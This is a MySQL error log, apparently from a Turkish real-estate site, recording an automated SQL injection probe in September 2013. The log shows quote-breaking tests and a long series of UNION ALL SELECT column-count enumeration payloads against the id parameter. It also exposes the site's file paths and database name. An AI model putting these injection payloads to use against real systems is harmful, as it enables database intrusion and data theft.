vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id= '436'' and onay in (2,4,0)
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''436'' and onay in (2,4,0)' at line 1
fonk : VT::sor
satir: 48
dosya: /home/emlaknet/public_html/sabit/detail.php
zaman: 08.09.2013 18:51:06

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id= '436'a' and onay in (2,4,0)
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a' and onay in (2,4,0)' at line 1
fonk : VT::sor
satir: 48
dosya: /home/emlaknet/public_html/sabit/detail.php
zaman: 08.09.2013 18:51:43

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="436""
hata : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"436""' at line 1
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:16

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:28

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:28

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:29

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:29

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:30

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:30

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:30

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:31

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:31

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:32

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:32

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:33

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:33

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:33

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:34

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:34

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:35

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:35

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:36

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:36

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:37

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:37

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:37

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:38

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:38

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:39

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:39

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:40

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:40

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:41

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:41

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and "x"="x"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:42

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:42

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:43

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:43

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:43

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:44

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:44

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:45

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:45

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:46

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:46

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:47

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:47

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:48

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:48

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:49

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:49

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:49

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:50

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:50

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:51

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:51

vt   : emlaknet_emlak
sql  : select * from ilan_ticari where id="999999.9" union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- a"
hata : The used SELECT statements have a different number of columns
fonk : VT::sor
satir: 59
dosya: /home/emlaknet/public_html/config.php
zaman: 08.09.2013 18:55:51

vt   : emlaknet_emlak
